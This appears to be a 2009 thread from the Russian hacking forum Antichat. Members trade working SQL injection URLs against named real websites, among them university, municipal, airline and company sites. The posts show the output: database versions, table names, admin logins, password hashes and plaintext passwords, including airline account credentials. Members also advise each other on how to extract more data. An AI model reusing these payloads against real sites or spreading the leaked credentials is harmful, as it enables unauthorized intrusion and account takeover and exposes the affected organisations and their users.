Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
12.01.2009, 04:59
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
это не скуля и уязвимости тут вроде как нет,ковычки итд экранируются и расширение не отбросить
Последний раз редактировалось ILYAtirtir; 12.01.2009 в 05:03..
|
|
|
12.01.2009, 05:11
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
http://walaber.com/index.php?action=showitem&id=-19+union+select+1,2,3,4,concat_ws(0x3a3a,version() ,user(),database()),6,7,8,9,10,11,12--
Version:5.0.45-log
User:walaber@cgi1403.int.bizland.net
Database:walaber_db
http://www.carbodydesign.com/video/?id=999992220+union+select+1,2,3,4,5,6,7,8,9,conca t_ws(0x3a3a,version(),user(),database()),11,12,13, 14,15,16,17,18,19,20,21--
Version:5.0.24a-log
User:u70469981@cgihost
Database:d60425765
|
|
|
|
12.01.2009, 10:33
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
Наконец то первая скуль которую сам нашёл и роскрутил!!!
Всем огромное за это спасибо!
Код:
http://www.yalta.org.ua/pages/firm.php?id=-1772%20union%20select%201,version(),3,4,user(),database(),7,8,9,10,11,12,13,14,15
version : 5.0.51a-15
user : u_admin_yalta@localhost
database: admin_yalta
Код:
http://www.yalta.org.ua/pages/firm.php?id=-1772%20union%20select%201,nick,3,4,password,6,7,8,9,10,11,12,13,14,15%20%20FROM%20user_data%20%20LIMIT%201,1
login:TopAdmin
password:878960
админка http://www.yalta.org.ua/admin/
тока когда ввожу данные, не заходит..не подскажите чё? |
|
|
|
12.01.2009, 11:58
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
муниципальный сайт города Алушта
Код:
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15%20union%20select%20version(),2,user(),database(),5,6,7,8,9,10,11,12%20--
version: 5.0.67-log
user: u7048@10.10.153.177
database: u7048
Код:
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15%20union%20select%20TABLE_NAME,2,3,4,5,6,7,8,9,10,11,12%20%20FROM%20INFORMATION_SCHEMA.TABLES%20--
имена таблиц
тока есть трабла, при запросе любой таблицы, типа
Код:
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%20%20FROM%20dn05_users%20--
выдаёт ошибку Table 'u7048.dn05_users' doesn't exist
чё за бред, подскажите |
|
|
|
12.01.2009, 12:21
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Табла лежит в другой бд.
Код:
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15+union+select+concat_ws(0x3a,table_schema,table_rows,TABLE_NAMe),2,3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES--
К тому же, табла dn05_users - пустая.
Зато есть таблица 4images_users.. |
|
|
|
12.01.2009, 15:34
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
Сообщение от R1dex
Табла лежит в другой бд.
Код:
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15+union+select+concat_ws(0x3a,table_schema,table_rows,TABLE_NAMe),2,3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES--
К тому же, табла dn05_users - пустая.
Зато есть таблица 4images_users.. нашёл, спасибо за инфу....помогло в двух скулях
|
|
|
|
12.01.2009, 15:38
|
|
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391
Репутация:
209
|
|
history.arizona.edu
http://history.arizona.edu/events/story.php?id=-197+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat (user(),0x2f,version(),0x2f,database()),14,15,16,1 7,18,19,20,21,22,23/*
user() - history@localhost
database() - history
version() - 4.0.12
www.coastal.edu
http://www.coastal.edu/news/story.php?id=1212+union+select+1,password,3,4,5,6, 7,8,9,10,11+from+mysql.user/*
www.housing.wisc.edu
http://www.housing.wisc.edu/resnet/news/story.php?id=-74+union+select+1,2,3,4,5,password,7,8,9,10+from+m ysql.user/*
Последний раз редактировалось 1NtR0; 13.01.2009 в 00:56..
|
|
|
|
13.01.2009, 01:25
|
|
Новичок
Регистрация: 21.01.2008
Сообщений: 4
Провел на форуме:
22394
Репутация:
0
|
|
Код:
http://www.ecominfo.spb.ru/news/index.php?id=-1186+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
version()=5.0.24a
дальше не смог раскрутить может кто попробует раскрутить |
|
|
|
13.01.2009, 03:24
|
|
Новичок
Регистрация: 21.01.2008
Сообщений: 4
Провел на форуме:
22394
Репутация:
0
|
|
Код:
http://www.natpress.net/stat.php?id=-3329+union+select+1,2,3,4,5,concat(login,char(58),pass),7,8,9,10+from+user--
админку не нашел
admin:9605e8702d88 |
|
|
|
13.01.2009, 04:31
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Бажные сайты от iTex:
http://www.regiontools.ru/index.php?page=products&pid=100585&item=-11646+union+select+concat_ws(0x3a,version(),databa se(),user()),2,3,4,5/*
5.0.41-log:regiontools:regiontools@cub.mplik.ru
наугад подобрал таблицу админа:
http://www.regiontools.ru/index.php?page=products&pid=100585&item=-11646+union+select+concat_ws(0x3a,login,password), 2,3,4,5+from+rt_admin/*
admin:5583413443164b56500def9a533c7c70:159753
админка http://www.regiontools.ru/admin.php
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+version()/*&id=-100009+union+select+user()/*
5.0.41-log
avantage1@cub.mplik.ru
узнаём название таблицы админа:
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+111/*&id=-100009+union+select+table_name+from+information_sc hema.tables+limit+17,1/*
avg_admin
достаём логин и пасс админа:
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+111/*&id=-100009+union+select+concat_ws(0x3a,login,password) +from+avg_admin/*
admin:6a4a680519c8eb06
админка http://www.avantage1.ru/cgi/admin.php
Так же на сайте присутствует форум phpbb,но походу права обрезаны т.к. при запросе на phpbb_users выдаёт ошибку.
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+concat_ws(0x3a,user(),database ())/*
nevgroup@cub.mplik.ru:nevgroup
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+table_name+from+information_sc hema.tables+limit+17,1/*
uralmpg_admin
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+concat_ws(0x3a,name,password)+ from+uralmpg_admin/*
admin : 5d2e19393cc5ef67 : password
админка http://www.nevgroup.ru/admin.php
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,user(),databa se(),version()),4/*
ogn66@cub.mplik.ru : ogn66 : 5.0.41-log
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,table_name,4+from+informatio n_schema.tables/*
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
fire_admin
fire_cat
fire_cat_group
fire_cat_item
fire_contacts
fire_contactshort
fire_files
fire_hackers
fire_main
fire_meta
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,login,passwor d),4+from+fire_admin/*
ogn:3d8b2df05dd09579b699a9de68c0d4c0
админка http://www.ogn66.ru/admin.php
Ещё заинтересовала очень таблица fire_hackers 
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,column_name,4+from+informati on_schema.columns+where+table_name=0x666972655F686 1636B657273/*
т.к. кавычка экранируется то fire_hackers в hex
id
ip
faultscount
blockedtill
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,id,ip,faultsc ount,blockedtill),4+from+fire_hackers/*
1:172.22.1.40:5:2006-11-22 16:15:22
2:194.226.147.230:4:2006-11-22 16:15:22
3:212.23.76.23:4:2006-11-22 16:15:22
4:194.226.152.113:4:2006-11-22 16:15:22
6:62.33.99.50:1
7:87.224.234.89:1
8:195.189.109.34:1
хммм...
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,user(),vers ion(),database()),4/*&rand=474
koltsovo@localhost:5.0.27:koltsovo
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,table_name,4+from+informat ion_schema.tables+limit+16,1/*&rand=474
kol_admin
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,name,passwo rd),4+from+kol_admin/*&rand=474
admin:*CF7FD12395BFB4CEF6EB0B7D4470B621D3F46BE9
vava:*424193A86C662F47463BC77A44B09CB77DDF5870
law:*831CEF9DA73F4BD8E83873E244FF0806EFA90497
orb:*B0F917485699B8B8453A9D41BD2731E69D9D0026
snow:*619C257D7D5EF71F843A7F8F593C1D33C0F1E9EE
forum:*3E64FE741BF14A31A4ED2B58A75A93EB16D809ED
cargo:*B77FC59BEB345D39A5E263E140E50AEB03F05873:cargaison
Так же заинтересовала очень табличка ua_paroles
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,column_name,4+from+informa tion_schema.columns+where+table_name=0x75615F70617 26F6C6573/*&rand=474#
id
name
class
content
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,id,name,cla ss,content),4+from+ua_paroles+limit+0,1/*&rand=474#
и через limit выводим:
1:vava: password:vo44
3:vava:admin:1
41:uralairline3: password:Sa13na
10:vava:ip:*.*.*.*
12:vava:ip:62.117.33.118
8:vava:ip:62.177.33.118
38:uralairline2: password:lO0ka2
13:skip: password:antiskip
14:skip:ip:*.*.*.*
20:zephyr: password:gene5ys
19:vava:ak:у6,u6,svr,сжр
21:zephyr:ip:*.*.*.*
22:zephyr:ak:ют,p2,piv,
39:uralairline2:ip:*.*.*.*
26:zephyr:admin:1
27:utair: password:uta1R
28:utair:ip:*.*.*.*
29:utair:ak:ют,p2,piv
40:uralairline2:ak:у6,u6,svr,сжр
30:skip:ak:у6,u6,svr,сжр
32:uralairlines: password:urAlA1rl1ne5
33:uralairlines:ip:*.*.*.*
34:uralairlines:ak:у6,u6,svr,сжр
42:uralairline3:ip:*.*.*.*
43:uralairline3:ak:у6,u6,svr,сжр
44:uralairline4: password:hO04
45:uralairline4:ip:*.*.*.*
46:uralairline4:ak:у6,u6,svr,сжр
47:uralairline5: password:xAv13r
48:uralairline5:ip:*.*.*.*
49:uralairline5:ak:у6,u6,svr,сжр
50:zozo:admin:1
51:zozo: password:z0z0
52:zozo:ip:*.*.*.*
53:zozo:ak:*
Так и не врубился от чего всё это =\
Последний раз редактировалось ILYAtirtir; 13.01.2009 в 05:09..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид